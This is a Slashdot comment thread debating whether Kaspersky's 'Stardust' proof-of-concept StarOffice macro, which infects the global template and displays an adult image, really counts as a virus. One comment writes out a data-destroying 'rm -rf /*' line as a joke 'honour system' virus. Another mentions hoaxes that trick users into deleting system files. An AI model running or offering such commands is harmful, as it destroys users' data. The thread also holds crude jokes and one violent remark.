If you're a customer of AT&T and you send 1 packet into AT&T's network, and it causes 20 packets to leave AT&T's network, AT&T (and other major ISPs) don't have any facilities to bill you for that, and can't even decide if you're liable for 1 packet worth of bandwidth, 20 packets worth of bandwith, or somewhere in between.

Even more complicated, suppose you send 1 packet to your tier 2 ISP, they end up sending 20 packets to their tier 1 ISP, and the tier 1 ISP ends up sending 100 packets out from there, which turns into 1000 packets delivered to end users, who gets billed how much? If the tier 1 ISP charges the tier 2 ISP for 100 packets, can they pass that on to you? Is it even possible for them to do that, since they don't necessarily even know how many packets the tier 1 ISP ended up sending or billing them for? The tier 1 ISP isn't about to send them a packet-by-packet breakdown of their bill.

It's a sticky problem that ISPs apparently just don't want to deal with.

Re:Proof of Concept to infect the planet

"Let D=Disney A=Attacker M=Multicast_Address DST=Destination... If A spoofs D sending bad data to M's DST"

Uhh, or you could have just said:
"If Attacker spoofs Disney sending bad data to Multicast_Address' Destination..."... Or to put it in your lingo:

Let O=Original_Poster P=Pompous_Ass... oh you get the idea...

No malicious code

[Duds]

If you're at the wrong kind of workplace, suddenly having porn on your screen is pretty bloody malicious.

Erh... no, boss, erh... no, that wasn't me

[Opportunist]

Me? Looking at porn at work? Noooo, sorry, must be that virus goin' round.

A heartfelt THANK YOU to the autor!

Re:Erh... no, boss, erh... no, that wasn't me

[Comatose51]

You're quite the opportunist...

Re:Erh... no, boss, erh... no, that wasn't me

just don't ask to shake hands...

Re:Bad terminology. Not a virus.

[Duds]

Get used to it. 99.9999% of windows "viruses" are just people dumb enough to go "OOOH LOOK IT SAYS IT'S A SCREENSAVER OF PONNIES!" rather than you know, viruses.

MOD PARENT UP

Couldn't agree more. There are some people in this world who need to be fed through Saddam's plastic shredder feet first.

Thanks!

[Chris+Bradshaw]

"proof-of-concept"

Cool... Thanks for the idea!

Respectfully Signed,
Anonymous Redmond Washington Resident

Not Really

[everphilski]

Star still has security through obscurity.

Not really. The virus writers have access to the source code. If they wanted to go deeper than macro viruses.

Re:Bad terminology. Not a virus.

[gmiley]

While you are technically correct, the author of this did not want to provide self-propogating attributes to it. That would take it more out of the realm of Proof-of-Concept and place it as an actual virus or worm. Anyone with any type of macro, scripting, programming skills could add a simple email routine and/or with a bit more skill scan for open network drives and copy itself out, etc...

The fact that it can run script on a client machine once a user opens the document is the entire point of the "virus".

So back to what I was orignally saying, this is, as you said, not a "virus". It is a "Proof-of-Concept Virus" however.

Losing data is always the real problem.

[khasim]

If you're in a company and a "virus" takes out one of the system files on one of your servers ... but the data is safe, you have less of a problem than if a "virus" leaves the server intact, but deletes all of your data.

It's always about the security of the data.

Which is why part of the OS's job is to restrict the ability of regular users as much as possible.

When all that is in danger is your personal home directory, that's really as good as the OS can be.

If we're talking single user/home machines ... the risk is greater that your hard drive will fail before you get a "virus" on your Linux box. With a failed hard drive (and no backup), you've lost all your data. At some point, it is up to the admin (the user in this case) to back-up his/her data. There is a point at which the OS/app's responsibility ends and the admin's begins.

Re:Losing data is always the real problem.

[xtracto]

It's always about the security of the data.

No, as GP said, the security of Infomration is more important. If a virus deletes the user's $HOME/Documents files I bet he will be *freaking* pissed after someone in the 1337U8UN7U forum tells him not to worry as the stability of the system is not going to be affected.

Re:Losing data is always the real problem.

[Nutria]

If a virus deletes the user's $HOME/Documents files I bet he will be *freaking* pissed after someone in the 1337U8UN7U forum tells him not to worry as the stability of the system is not going to be affected.

Let's say that you and I both get some bit of malware, you on WinXP (where there's a 99.44% chance your accout has Administrator privs), and me on Linux, logged in as "ron", who doesn't has root privs.

How do we recover?

You must reinstall WinXP and every application, then all data. Much time (2 weeknights, or a long Saturday) and aggrivation is expended.

I, OTOH, create a ron2 account, and log in to the GUI under that account, and, while reading /., open an xterm, "su -", and restore the "ron" files from my external HDD. No problems.

"Announcement" unconnected to Kapersky's products?

[whoever57]

I am sure that this announcment has nothing whatsoever to do with the fact that Kapersky sells virus checkers for Linux.

Kapersky has products for Linux file servers and mail servers -- although I cannot find anything beyond a price on their website, so perhaps what they have is a product that checks for Windows viruses but happens to run under Linux.

Macro copying

[hackwrench]

The key element of a virus is that it copies itself. What is the purpose of having a macro copy itself without user intervention?

OpenOffice too!

[levell]

Although the summary doesn't explicitly say it, the article confirms that this affects OO as well as StarOffice

Yawn

[jofi]

So like every win32 virus it isn't a spawn of already existing code, and someone had to write it using an existing API or scripting engine that anyone can use and has already used for otherwise legitimate purposes? Get rid of scripting engines and APIs. Problem solved.

Downloads "adult" content...

[locokamil]

This thing downloads adult content and displays it. And this is a bad thing for us dorks because...

Proof of security

[MobyDisk]

This virus doesn't do any damage. Is that because Star Basic runs in a sandbox and can't actually do damage? Or is it because the proof-of-concept virus didn't want to do any damage? If there is a sandbox, all this did is prove how secure Star Office is, not how vulnerable it is.

Is this really a virus?

[xutopia]

Pardon me for asking but doesn't the definition of a virus include duplication? All I hear is that some code can download a picture. How does it "reproduce" itself and infect other stations?

Re:Is this really a virus?

[Compholio]

Pardon me for asking but doesn't the definition of a virus include duplication? All I hear is that some code can download a picture. How does it "reproduce" itself and infect other stations?

It doesn't, macros are of the "Trojan" variety. Personally, I think we should call the whole virus/worm/trojan category "Internet Transmitted Diseases", or ITDs for short, so that they're scarier to the non-tech crowd.

Re:Is this really a virus?

[xutopia]

Well macro viruses from the original definition do exist. Many of them would launch when opening a word file, infect all other word files on the computer and send an attachment to everyone in the address book. Of course these only work on MS Office.

hm..

[DoctorDyna]

It seems as though they intend "proof of concept" to mean "Yes, it *IS* possible to manipulate this software with a virus, had we wanted to."

Just because all it does is download porn, doesnt mean that it couldnt download a shell script that wipes out the MBR on your hard disk.

Re:hm..

[nstlgc]

It seems as though they intend "proof of concept" to mean "Yes, it *IS* possible to manipulate this software with a virus, had we wanted to."
Congratulations. That's what it means indeed.

Re:hm..

[DragonWriter]

Just because all it does is download porn, doesnt mean that it couldnt download a shell script that wipes out the MBR on your hard disk.

OTOH, it also doesn't demonstrate that it could download such a shell script and cause it to be executed without user intervention.

So its not really a "proof of concept" as regards that particularly capacity at all. The fact that it doesn't show that you can't do it is meaningless, that tells you nothing you didn't know without the so-called "proof of concept".

Re:hm..

[The+Cisco+Kid]

Of course, becuase after all everyone runs StarOffice as a user that has direct write access to their /dev/hdX nodes. Just becuase you are a Windows user that doesnt understand the concept of seperation of privilege becuase MS never bothered, doesnt mean that it doesnt exist. (Er, thats of course assuming you arent running StarOffice on a Windows system, in which case the vulnerability is an MS one anyway)

goatse

[EccentricAnomaly]

What? No link to the "adult content?"

be careful what you wish for... the 'adult content' could be goatse

No need to worry

[sootman]

Both StarOffice users have been contacted and were warned to be careful.

Re:No need to worry

[HaydnH]

Graboid (975267) on Thursday June 01, @05:14PM - Modded -1 Flamebait:

"To both users of Open Office. I'll bet they're shaking in their boots!"


sootman (158191) on Thursday June 01, @05:59PM - Modded +5 funny:

"Both StarOffice users have been contacted and were warned to be careful."


/. moderation at it's finest there! Surely the second post should also have been flamebait or at least redundant? Oh wait... ones talking about OOo - must protect our open source masters!!

This news is 2 days old!!

It's sad to see that Slashdot is becoming irrelevant... this same news article was posted on other news websites up to two days earlier, but Slashdot prefers to link to the CNet article only. Other submissions on the same topic are rejected outright. Bias? Nah... haha it's just moderator preferences that are making competitor sites like Digg grow and Slashdot stay static because it too often now has older, less-timely links.

Re:This news is 2 days old!!

Heh, I was going to suggest that instead of "from the batten-down-the-hatches-maties dept." they put "from the better-late-than-never dept.".

Ironically this will be cause enough for people to stick with MS Office, though god knows why, given the number of exploits it's had over the years.

Re:Bad terminology. Not a virus.

[Aim+Here]

But when you execute that screensaver, it emails itself to other dumb windows users. Does this supposed OpenOffice 'virus' have any form of replication, human-assisted or otherwise? Without some form of replication, this is less of a virus than some Unix shell script that reads something like:

rm -rf /* #This virus uses the honour system. Please email this to all your friends before executing as root

The "proof of concept"

[DragonWriter]

That it infects the global template when opened from a document file is the actual "proof of concept" here, and if it really doesn't require user intervention, in the default configuration of StarOffice or OOo, to (1) allow macros to run, and (2) allow a macro running in one document to affect the global template, then there is a real, though I would suspect fairly simple to fix, problem; document macros need to run, by default, in a more tightly-restricted sandbox than that.

Re:The "proof of concept"

If that is true, I'd have to agree. But the press release doesn't say anything about that, it only says it's a document that (downloads and) displays a picture.

And yes, documents should not be able to change a template, that would be a bug (Feature in MS-speak, let's see how Sun are going to categorize it).

Re:Bad terminology. Not a virus.

[DragonWriter]

The fact that it can run script on a client machine once a user opens the document is the entire point of the "virus".

Any document format with a scripting facility provides the capacity to a script on the client machine when a user opens a document. If that's all it takes to have a "virus", then every macro is a "virus".

Whoosh!

[phantomfive]

And that whooshing sound you just heard was a veiled goatse reference flying over your head.

Where can I get StarOffice?

[Lethu]

...and the virus also.

Further proof

[HumanisticJones]

It downloads an image file with adult content from the Internet and opens that file in a new document, according to Kaspersky's posting.

So I guess this is just further proof that the internet is indeed for porn.

macros are easy to remove for OOo files

[athena_asamiya]

Star Office and OpenOffice files are not like Microsoft Office files anyhow, they are zipped up xml files in folders. So it's possible to view or remove all macros without loading them into OOo or having a special tool. They aren't mixed in with some secret format.

No, it's not.

[CarpetShark]

Losing $HOME, for anyone who cares about their data enough anyway, means restoring from backup (ie, somewhere outside $HOME, even if it's just in another dir). If something outside $HOME is compromised though, then then that user has risked many other systems and users; not just himself. In doing so, he made the 'net more difficult to police, and exposed himself to future troubles. We're all connected now.

Not my frozen bubble scores!!!!!!1

[ElleyKitten]

Oh my God! *runs off to backup high score file*

Re:Bad terminology. Not a virus.

[Mister+Whirly]

Some call it Darwinism at work, I call it Job Security (TM)...

Re:Bad terminology. Not a virus.

[Duds]

True (and I'm so tempted to see if a windows version of your example would actually work) but the point is you'll have to live with all malicious code being called a virus because the great unwashed doesn't know any different.

It's just a proof of concept..

[Psyx]

until someone loses an eye.

Re:Bad terminology. Not a virus.

[gmiley]

Potentially, yes. It also needs to be able to operate outside of its containing application, such as retrieving and loading external content without the approval of the user.

Which just goes to prove

[The+Cisco+Kid]

That publishing or distributing information in *any* 'word processor' format is just silly. The only time you should send or accept a 'word processor' format file from anyone is when you are specifically collabortating with that person to co-produce that document, and you have agreed in advance to use that specific format.

And even then it would make sense to use plain text to collaborate on the *content* of the document, and then have one person do the 'typesetting' in an appropriate application once the content is complete. Content update/edits would go back to the plain text, and then re-typeset the new version.

Oh, and if your document isnt of sufficient size or importance to do it that way - it probably doesnt need fancy fonts and formatting anyway.

Re:Which just goes to prove

[DragonWriter]

And even then it would make sense to use plain text to collaborate on the *content* of the document, and then have one person do the 'typesetting' in an appropriate application once the content is complete. Content update/edits would go back to the plain text, and then re-typeset the new version.

Good luck convincing people to give up Word for TeX, sensible as your idea is.

Meet my mother

[atrocious+cowpat]

"I don't, nor do I known anyone that does, back up their /home folder daily."

My mom works on a (OS X) Mac (small home office), so far safe as houses as viruses are concerned. Still her machine is backupped (is that actually a word?) on a 7-day-basis, i.e. every day of the week her user-directory is written to a different backup-set on a seperate HD (= 7 different backups, one for each day of the week). Every 3-4 weeks I burn a snapshot of all her data onto DVDs. Why?

It may seem like overkill, but I set things up this way not because I'm scared of the havock a virus might wreak, but because I know that my mother every once in a while f*s up, deletes or otherwise ruins important files, preferably spreadsheets that are extremely painful to reconstruct. Her own files - not system files. And usually she doesn't notice until either 3 days or 3 months later.

I sleep well, she can do whatever she wants, and everyone is happy.

Can they execute arbitrary code?

[anubi]

If they cannot execute arbitrary code, or retrieve hidden snippets of info from me, then I cannot get too antsy.

I can see where there could be a legitimate need to display an image from the web.

And whatever can be done, can be done poorly, as how could I expect the software to censor a pornographic image when it doesn't even know what one is?

Its the ability to execute arbitrary code or snoop that concerns me. These lead to identity theft, keyloggers, and kernel mode rootkits.

One who remains ignorant of STD's is apt to get one.

One who doesn't know how his machine works is apt to lose control of it.

Knowledge is what open source is all about - and why we can talk of security issues freely so it does not become a problem.

In an ideal world, letting someone know they have a security problem should rank about the same seriousness as advising a friend he forgot to zip up after a nature call.

This bird flu thing going around is a problem only because we don't know exactly how it works. If we did, we could easily sidestep it.

It never ceases to amaze me businesses tolerate the enforced ignorance paradigm that keeps putting us all at risk.

Re:Oh no - big threat!!

(Ok, just kidding, they're probably up to 10 actual users by now). Of course, the user that reads binary and the one that can't.

where's the virus?

[lon3st4r]

Ok fine. So this macro can download a image and open in another new document. But any legit macro should also be able to do that (i mean, just refer to a web image in a new document, and you're done).

What this guy has a a doc which has a macro embedded in it. And all you get is an execution of that macro when you open the doc.

Where are the *real* characteristics of a virus - spreading to other files on the disk?

* lon3st4r *

Virus Spreading Problem...

[fprog26]

The problem may not really be the "payload" as in deleting $HOME,
which would be annoying or disrupting if you don't rsync, tar or backup it.

But the fact that someone could maybe abuse it, and start "replicating"
by sending itself via sendmail or whatever or replicating to all your OO.org documents.
Think I LOVE YOU virus or similar or maybe I'm just too outlook oriented.

What's more stupid is that a script kiddy would simply take this proof, take some word/excel virus and simply adapt it...

I think it is stupid to provide such insecure macro thingy; moreover, displaying a proof of concept to everyone,
before a CERT is release to the OO.org developer or similar...

Just my 2 cents.

Re:Virus Spreading Problem...

[Nutria]

start "replicating" by sending itself via sendmail

It would be useful to know whether OOo BASIC can get out of the OOo sandbox and access the live system.

Actual details on virus

[khanyisa]

The article itself is light on details, which they promise to write up in their Virus Encyclopedia but apparently haven't yet.
TechWack has more though (without quoting a source):

Antivirus firm Kaspersky is calling the virus "Stardust". This virus is basically contained in a StarOffice document that uses macros and then infects a global template, which is used by the application to generate new documents. If a victim opens the file carrying this virus, Stardust copies it into the global template and all contained in a StarOffice document that uses macros and then infects a global template gets infected by it used by that copy of the software.

Re:Actual details on virus

[khanyisa]

Just found the entry in the Virus Encyclopedia here: http://www.viruslist.com/en/viruses/encyclopedia?v irusid=123066 (although it hasn't been updated yet)

Re:Agile Virus Writers?

[callistra.moonshadow]

I like the description of "A proof of concept virus." I guess virus writers are using the Agile Methodology. j/k

Re:Bad terminology. Not a virus.

and I'm so tempted to see if a windows version of your example would actually work

It does, there are several examples in the wild. Usually they say something like "OMG, I just found a virus on my system and it might have spread to everyone in my address book. If you have (name of Windows system file) in C:\WINDOWS\SYSTEM32, delete it immidiately and forward this warning to all your contacts".

And yes, the moron I got it from had already deleted the system file. Luckily not one of the files needed to boot the system though.

definition of virus

[tod_miller]

3 telltale signs microsoft commissioned this: They want to start getting peoples imaginations onto damaging the name of staroffice.

1) adult file: yikes! imagine if it had loaded a normal image, nothing for representatives to get upset about then is there
2) This isn't even a virus, how lame
3) It is microsoft, come on

While is a nuisance, it isn't a virus. It doesn't replicate. It isn't a worm or trojan.

It doesn't exploit anything.

In fact, isn't it useful to have remote hosted files open in documents if you decide you want them? Isn't that a legitimate use of star basic?

If you allow it.

Nothing to see here people, especially if they used goatse as the adult image.

If it was some cute amateur, then send me the virus now!

After years of falling for 'Anna Kournikova' and the like, finally a virus than mans up and gives us what we want.

please type the word in this image: FuckBill
verification text - if you are visually impaired, please email us at pater@slashdot.org

In the immortal words of Strong Bad

"Backup my files"? are you kiddin? Is that a real thing you have to do? I always though that was just like, you know, a figure of speech. I dunno like 'wake up and smell the coffee' or 'see ya later alligator'

One Step too far

[mahju]

I think that StarOffice adding this feature might be one step too far in copying microsoft's product....